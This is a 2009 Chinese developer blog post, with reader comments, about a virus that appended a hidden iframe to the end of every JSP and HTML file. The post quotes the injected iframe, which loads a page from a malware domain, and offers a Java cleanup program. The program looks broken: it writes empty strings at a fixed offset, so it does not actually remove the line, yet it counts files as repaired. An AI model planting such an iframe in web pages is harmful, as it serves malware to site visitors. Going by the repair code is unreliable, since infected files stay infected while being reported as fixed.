冷面阎罗

低调做人&&高调做事
随笔 - 208, 文章 - 3, 评论 - 593, 引用 - 0
数据加载中……

中了一个很奇怪的病毒,所有的jsp文件均为改写

      上周末,机器中毒了,起初自己没有发现,后来写代码发现运行jsp文件,机器变的奇慢务必,后来以为是机器慢,就把qq、msn 等工具全关掉了,发现还是不行,后来把上网的代理关掉时候发现正常了;再一看jsp文件发现全部被改写了,在文件最后一行加上
<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>
      于是上网找杀毒软件,刚开始用的诺顿(公式规定必须安装),发现不行就换别的软件,可是病毒不让你安装别的杀毒软件,甚至打开有解决方法的网页,都会将ie关闭。
 
     后来同事给了360,算是把病毒稳定了,可是我的jsp、html文件都被改写了,这时想到写程序解决,下面是我弄的java程序删除文件中被增加的iframe。
import java.io.File;
import java.io.RandomAccessFile;

public class RepairPage
{

    
private static int num;

    
private String worm = "<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>";

    
public void repair(File page)
    
{
        
//System.out.println("Try File:"+page.getPath());
        try
        
{
            RandomAccessFile r 
= new RandomAccessFile(page, "rw");
            
if (r.length() < 68)
                
return;
            r.seek(r.length() 
- 68);//跳到最后一行
            String shit = r.readLine();
            
if (shit.equals(worm))
            
{
                
//System.out.println("shit content:"+shit);
                System.out.println("修复损坏文件:" + page.getPath());
                r.seek(r.length() 
- 68);
                
for (int i = 0; i < worm.length(); i++)
                
{
                    r.writeBytes(
"");
                }

                num
++;
            }

        }

        
catch (Exception e)
        
{
            e.printStackTrace();
        }

    }


    
public void doDir(File dir)
    
{
        
if (dir.canRead())
        
{
            
if (dir.isDirectory())
            
{
                String[] files 
= dir.list();
                
if (files != null)
                
{
                    
for (int i = 0; i < files.length; i++)
                    
{
                        doDir(
new File(dir, files[i]));// 递归
                    }

                }

            }

            
else
            
{// is File
                String name = dir.getName();
                
if (name.endsWith("jsp"|| name.endsWith("html"|| name.endsWith("htm"))
                    repair(dir);
            }

        }

    }


    
public static void main(String[] args)
    
{

        File dir 
= new File("E://program//guizhou//09检试源码//web//");
        RepairPage repair 
= new RepairPage();
        repair.doDir(dir);
        System.out.println(
"修复成功完成,修复文件数:" + repair.num);
    }


}

posted on 2009-02-17 10:49 冷面阎罗 阅读(988) 评论(8)  编辑  收藏

评论

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写[未登录]  回复  更多评论   

恩,我也中过这个病毒。我中的时候每个网页的iframe里面src的值都不一样的。
2009-02-17 11:35 | haha

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

我现在中的就是这个毒但是用360还是杀不了病毒。
360发现没有病毒,但是用vs新建一个网页文件他又会在最后面加上这个<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>
2009-02-18 10:06 | bigeng

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

操,不会CVS重新down一份么?
2009-02-18 10:19 | hdware

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

呵呵,碰到过,硬改代码恢复的,痛苦
2009-02-18 14:07 | jeasonzhao

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写[未登录]  回复  更多评论   

妈的,上千页面都有这个代码,惨啊,怎么改啊
2009-02-20 10:45 | dd

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

也中标了,而且这个shit还在压缩文件里面加了一个病毒文件"安装.bat".
另外请问下500错误之类的错误信息页面在哪个文件夹下面?或者是动态生成的?
2009-02-23 15:55 | tt

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

哦.另外问下你这个程序是在什么环境下运行的?
还有好象这个病毒下载的东西把host文件也给改了,把杀软的网址全指向本地,并且来了一句以下为恶意网站,杀了毒之后系统蓝屏,这两天真被弄死了
2009-02-23 16:00 | tt

# re: 中了一个很奇怪的病毒,所有的jsp文件均为改写  回复  更多评论   

这是ARP病毒,
2010-05-15 14:06 | asfd

只有注册用户登录后才能发表评论。


网站导航: